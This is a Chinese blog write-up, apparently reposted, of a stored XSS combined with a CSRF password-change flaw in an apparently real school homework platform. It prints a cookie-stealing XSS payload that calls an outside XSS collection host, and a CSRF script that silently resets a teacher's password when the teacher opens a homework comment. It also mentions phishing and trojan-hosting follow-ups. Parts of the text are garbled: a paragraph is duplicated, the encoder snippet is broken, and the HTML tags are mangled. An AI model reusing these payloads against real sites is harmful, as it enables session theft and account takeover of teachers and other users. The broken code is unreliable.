本文来源:蚁景科技
本文首发于“合天智汇”公众号,作者: 影子 各位大师傅,第一次在合天发文章,请多多关照 今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了 ,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难啊,难啊)
本文首发于“合天智汇”公众号,作者: 影子 各位大师傅,第一次在合天发文章,请多多关照 今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了 ,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难啊,难啊)
- 0x01
- 0x02
- 0x03
in_str = "(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api})();if(''==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession" output = "" for c in in_str: output += "svg>script>eval("" + output + "")/script>")payload为 在进行测试
svg>script>eval("(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api})();if(''==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession")/script>看看xss平台 成功获取 也可以使用其他的利用方法 跳转钓鱼网站 在页面内这是html表单进行钓鱼 或者js挂马等等 严重程度 中危 But。。 部分Cookeis设置了http-only,拿不到老师的全部cookie。
- 0x04
``` script type="text/javascript" src="http://admin.3cjz.cn/include/jQ.js">/script> script> function loginSubmit() { $.ajax({ url: "https://www.xxxxxxxx.com/UserApi/updatePassword", type: "post", data: {"newpassword": "123456789"}, dataType: "json", success: function (data) { if (data.status == "1") { } else { } }, }); } loginSubmit() /script> ```那么要去受害者要有兴趣去访问这个payload 作业处,受害者(例如老师,获取更大权限)老师要去更改作业 找到在作业留言处存在存储型xss 在此处插入payload 查看效果 现在密码为123456789 登录正常 将payload的密码改为123456789. 我用的手机端(pc端似乎要抓包,懒) 提交成功 教师端进入批阅 老师的管理界面 教师端进入批阅 抓包看到 访问时,直接更新了密码 退出 密码为12345679时错误 密码为123456789.时成功 更改密码处存在csrf 联想到刚刚的存储型xss, 一个csrf+xss的组合拳漏洞
- 0x05
转载请注明来自网盾网络安全培训,本文标题:《Csrf+Xss组合拳》
标签:web安全
- 上一篇: Tsunami:一款功能强大的通用网络安全扫描工具
- 下一篇: 成都链安:加密货币的骗局『名册』